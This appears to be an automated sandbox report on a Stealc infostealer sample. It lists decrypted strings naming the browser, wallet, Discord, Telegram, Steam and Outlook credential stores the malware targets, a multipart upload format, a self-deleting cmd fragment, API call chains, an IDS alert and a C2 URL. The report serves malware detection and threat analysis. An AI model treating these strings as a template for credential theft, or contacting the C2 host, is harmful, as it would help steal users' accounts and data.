Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Local State
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: profiles.ini
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: chrome
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: opera
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: firefox
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: wallets
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: ProductName
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: x32
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: x64
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: DisplayName
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: DisplayVersion
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Network Info:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - IP: IP?
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - Country: ISO?
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: System Summary:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - HWID:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - OS:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - Architecture:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - UserName:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - Computer Name:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - Local Time:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - UTC:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - Language:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - Keyboards:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - Laptop:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - Running Path:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - CPU:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - Threads:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - Cores:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - RAM:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - Display Resolution:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: - GPU:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: User Agents:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Installed Apps:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: All Users:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Current User:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Process List:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: system_info.txt
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: freebl3.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: mozglue.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: msvcp140.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: nss3.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: softokn3.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: vcruntime140.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: \Temp\
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: .exe
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: runas
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: open
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: /c start
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: %DESKTOP%
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: %APPDATA%
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: %USERPROFILE%
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: %DOCUMENTS%
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: %RECENT%
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: *.lnk
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: files
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: \discord\
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: \Telegram Desktop\
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: key_datas
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: map*
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Telegram
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Tox
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: *.tox
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: *.ini
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Password
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: 00000001
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: 00000002
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: 00000003
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: 00000004
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Pidgin
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: \.purple\
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: accounts.xml
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: token:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Software\Valve\Steam
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: SteamPath
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: \config\
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: ssfn*
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: config.vdf
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: DialogConfig.vdf
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: libraryfolders.vdf
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: loginusers.vdf
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: \Steam\
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: sqlite3.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: done
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: soft
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: https
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: POST
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: HTTP/1.1
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: hwid
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: build
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: token
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: file_name
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: file
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: message
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_00406000 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,	2_2_00406000
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_00404B80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,	2_2_00404B80
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_00407690 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	2_2_00407690
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_00424090 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	2_2_00424090
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_00409BE0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	2_2_00409BE0
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_00409B80 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	2_2_00409B80
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021A9E47 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	2_2_021A9E47
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021B7260 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,	2_2_021B7260
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021A6267 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,	2_2_021A6267
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021C42F7 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	2_2_021C42F7
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021AEFF7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,	2_2_021AEFF7
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021B7047 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,strtok_s,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,	2_2_021B7047
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021A78F7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	2_2_021A78F7
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021A4DE7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,	2_2_021A4DE7
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021A9DE7 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	2_2_021A9DE7

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Unpacked PE file: 0.2.LXS5itpTK7.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Unpacked PE file: 2.2.B5F8.tmp.exe.400000.0.unpack

Source: LXS5itpTK7.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.5:49704 version: TLS 1.2

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_004389F2 FindFirstFileExW,	0_2_004389F2
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_02168C59 FindFirstFileExW,	0_2_02168C59
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021B1EA7 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	2_2_021B1EA7
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021B3F27 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	2_2_021B3F27
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021BCF47 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	2_2_021BCF47
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021ADFD7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	2_2_021ADFD7
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021A1807 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	2_2_021A1807
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021A1820 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	2_2_021A1820
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021B1827 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	2_2_021B1827
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021BE0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,	2_2_021BE0B7
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021BD8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,	2_2_021BD8A7
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021B5127 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	2_2_021B5127
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021BE597 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	2_2_021BE597

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49706 -> 92.255.57.89:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://92.255.57.89/45c616e921a794b8.php

Source: global traffic

